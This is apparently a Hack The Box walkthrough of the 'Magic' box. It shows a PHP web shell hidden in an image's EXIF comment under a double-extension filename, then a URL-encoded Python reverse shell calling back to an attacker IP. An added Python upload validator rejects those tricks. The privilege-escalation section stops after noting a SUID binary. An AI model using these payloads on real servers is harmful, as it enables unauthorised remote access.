Magic — HTB walkthrough

ENUMERATE

Nmap scan

Aggressive scan for service versions with default scripts.
Visiting the website.

We embed the PHP payload in the image's EXIF comment and give the file a double extension:

# exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' exploit.png
# cp exploit.png exploit.php.png

The upload goes through.

EXPLOITATION

We access the uploaded image and get a reverse shell through the cmd parameter we added in our payload.

http://10.10.10.185/images/uploads/exploit.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
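The two tricks above (a second extension on the filename and PHP hidden in an EXIF comment) are exactly what a server-side upload check has to reject. The following is an added example of such a check, not code from the box or from the original post; the file names and image bytes are constructed samples, and the handler name, extension list and reasons are my own.

```python
import os
import re
import secrets

# Signatures a real image of an allowed type must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}

# Any PHP open tag anywhere in the bytes: EXIF/text comments, trailing data, etc.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file (assumed helper)."""
    base = os.path.basename(filename)          # drop any client-supplied path
    parts = base.lower().split(".")
    # "exploit.php.png" has two extensions; only "name.ext" is allowed, because a
    # mis-set script handler can treat any file with .php in its name as PHP.
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be exactly name.ext"
    ext = parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag found in image data"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-side name for an accepted file: random token + validated extension."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples (not files from the box): a clean PNG header, and the same
# header with a PHP tag sitting where a text/EXIF comment chunk would be.
CLEAN_PNG = MAGIC["png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 20
TAGGED_PNG = MAGIC["png"] + b"tEXtComment\x00<?php echo 'x'; ?>"
```

Validation alone is not the whole fix: the web server must also be configured so that nothing under the uploads directory is ever handed to the PHP interpreter.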
Getting user.txt.

PRIVILEGE ESCALATION

While enumerating, we see that the user theseus has SUID privileges on /usr/bin/sysinfo.

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.